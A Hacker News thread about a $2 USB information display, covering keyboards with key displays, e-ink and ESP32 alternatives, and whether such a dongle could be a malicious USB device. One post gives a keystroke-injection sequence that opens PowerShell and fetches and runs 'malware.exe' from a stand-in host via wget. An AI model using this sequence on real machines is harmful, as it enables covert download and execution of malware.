Live data from Hacker News

$2 WeAct Display FS adds a 0.96-inch USB information display to your computer

cnx-software.com

121–130 of 175 posts

Re: $2 WeAct Display FS adds a 0.96-inch USB information display to your computer

#121

Earlier quoted context omitted.

Unfortunately these are still a bit too expensive to e.g. have one on every key of a standard 101-key keyboard.

Takes me back. https://store.artlebedev.com/electronics/optimus-maximus/#51... Think this was $1200. Honestly don’t think I would spend any extra money on dynamic keys- I never look at my keyboard.

The Elgato Stream Decks, although not keyboards proper, come very close

Re: $2 WeAct Display FS adds a 0.96-inch USB information display to your computer

#122
post #111

What's stopping this thing from keylogging or inserting keystrokes? Malicious USB devices are fairly common, and this certainly has the 'right' form factor. There's a reason 'do not plug in a USB drive you have found in the parking lot' is reiterated in every corp security training.

Keylogging? Just how do you think it can read any keystrokes? As for inserting keystrokes, that will be obvious if it enumerates as a keyboard. You should turn down your paranoia a little more.

The better attack vector would be the programs you need to use the display

Re: $2 WeAct Display FS adds a 0.96-inch USB information display to your computer

#123
On personal computers (laptops) I would like to see a ambient info display and/or edge lighting / indicator option that can be customized and conrolled by software.

One of the use cases i like is a visible indicator of when the Video camera/ screenshare or microphone is on -- and if the user wishes to, display that status (busy/on air) to others around them (like some over-the-ear headphones currently do).

It will serve was a reminder to the user themselves to be mindful of the cam/screen/mic -- and also to nearby people not to disturb them to walk into camera frame unintentionally.

I am sure there are tons of other uses for those willing to experiment.

Re: $2 WeAct Display FS adds a 0.96-inch USB information display to your computer

#124
post #111

What's stopping this thing from keylogging or inserting keystrokes? Malicious USB devices are fairly common, and this certainly has the 'right' form factor. There's a reason 'do not plug in a USB drive you have found in the parking lot' is reiterated in every corp security training.

Keylogging? Just how do you think it can read any keystrokes? As for inserting keystrokes, that will be obvious if it enumerates as a keyboard. You should turn down your paranoia a little more.

There are plenty of USB keyloggers available for purchase right now.

While I can try and conjecture how those might work, that's not really in my lane.

Re: $2 WeAct Display FS adds a 0.96-inch USB information display to your computer

#125
post #111

What's stopping this thing from keylogging or inserting keystrokes? Malicious USB devices are fairly common, and this certainly has the 'right' form factor. There's a reason 'do not plug in a USB drive you have found in the parking lot' is reiterated in every corp security training.

Keylogging? Just how do you think it can read any keystrokes? As for inserting keystrokes, that will be obvious if it enumerates as a keyboard. You should turn down your paranoia a little more.

> As for inserting keystrokes, that will be obvious if it enumerates as a keyboard.

This is true, but this also doesn't need to happen at insertion time. An HID keyboard can show up, say, 3 hours after you plug it in.

I miss grsecurity's patch set so much. It had an option to defeat this (deny all USB device enumeration post-boot, i.e. after the kernel executes init).

Re: $2 WeAct Display FS adds a 0.96-inch USB information display to your computer

#126
post #124

Earlier quoted context omitted.

Keylogging? Just how do you think it can read any keystrokes? As for inserting keystrokes, that will be obvious if it enumerates as a keyboard. You should turn down your paranoia a little more.

There are plenty of USB keyloggers available for purchase right now. While I can try and conjecture how those might work, that's not really in my lane.

Those work by sitting between the real keyboard and the computer, often deliberately designed to appear as an innocuous adapter (say, a USB-A keyboard plugged into a PC's USB-C port or vice versa) or extension cable.

Re: $2 WeAct Display FS adds a 0.96-inch USB information display to your computer

#127
post #40

Earlier quoted context omitted.

... I don't get why folks would want to use such ram sticks... That said, I am very appreciative of my 'inline USB-C power draw monitor' from a standpoint of understanding what kind of draw a given device has (up to it's limit ofc)

> inline USB-C power draw monitor I have a couple of those and I love them! Mine support up to 100W power draw. Before I got them, I hadn’t ever considered that a variable amount of power could be drawn by a laptop while charging. For example, right now my laptop is at 63% battery and currently charging. It’s drawing 36W at the moment. When the battery charge is lower, it’s drawing more power from the outlet, and the…

> For example, right now my laptop is at 63% battery and currently charging. It’s drawing 36W at the moment. When the battery charge is lower, it’s drawing more power from the outlet, and the higher the battery charge is getting, the less power it’s drawing from the outlet.

This is because Li-Ion charging logic is known as "CC-CV", or constant current followed by constant voltage. You limit the charging current to some value (say 1A) until the cell attains the target voltage (almost always 4.2V, though some chargers limit it to 4.1V to prolong cell life), and then you hold it at that voltage until the current diminishes significantly (most chargers cut the cell off and indicate charge complete when the current draw drops to 10% of its max (during the CC phase) charge current, i.e. 100mA here).

Re: $2 WeAct Display FS adds a 0.96-inch USB information display to your computer

#128
There is a similar device from lilygo which has an ESP32S3 plus also a SDCard slot all in one USB stick. It is available all over Aliexpress for around $10.

You do have to code it yourself if you want to display information on it. However it has all the goodies of the ESP32S3 which is a very powerful MCU with wifi and bluetooth.

For fun I ported my railway station display [2] firmware which also runs on a ESP32S3 to it [3]. Cool little gadget.

[1] https://lilygo.cc/products/t-dongle-s3

[2] https://www.stationdisplay.com/

[2] https://imgur.com/a/yXjK3Ge

Re: $2 WeAct Display FS adds a 0.96-inch USB information display to your computer

#129

I recently researched USB connected information displays but I am interested in e-Ink. I want - USB power + data - Open interface so I can drive it from my own software on the host (but not like a traditional monitor, I imagine more uploading pre-rendered bitmaps) - Image retention when powered off - High resolution paper like appearance - Between A5 and A4 in size - At least black, red and yellow as colors - Buttons…

>>Between A5 and A4 in size Very expensive. For $59 you can get M5PaperS3 ESP32S3 Development Kit (960x540, 4.7" eInk Display, 235 ppi) https://shop.m5stack.com/products/m5papers3-esp32s3-developm... Or you can get: https://lilygo.cc/products/t5-e-paper-s3-pro But these have 4.7 inch display. You can probably hack and repurpose old e-readers if you can be bothered with the technical pain.

Soldered.com makes some really nice eInk dev boards, including one with a 5.8" 7-color display: https://soldered.com/categories/inkplate/color-e-paper/

Re: $2 WeAct Display FS adds a 0.96-inch USB information display to your computer

#130
post #120

"it’s USB so it can also suddenly change into a keyboard and inject keystrokes to steal your files and upload them "

And exactly how would it be able to achieve that?

Malicious USB dongles capable of achieving this have been demonstrated before. For example, a Windows-targetting variant injects the keyboard sequence

  Super+R
  (Sleep for 1 second)
  powershell.exe (Enter)
  (Sleep for 1 second)
  wget http://example.net/malware.exe | cmd (Enter)
For example, a Rubber Ducky [1] can trivially be configured to accomplish this with the included tooling in under 5 minutes.

[1] https://shop.hak5.org/products/usb-rubber-ducky

Post reply on HN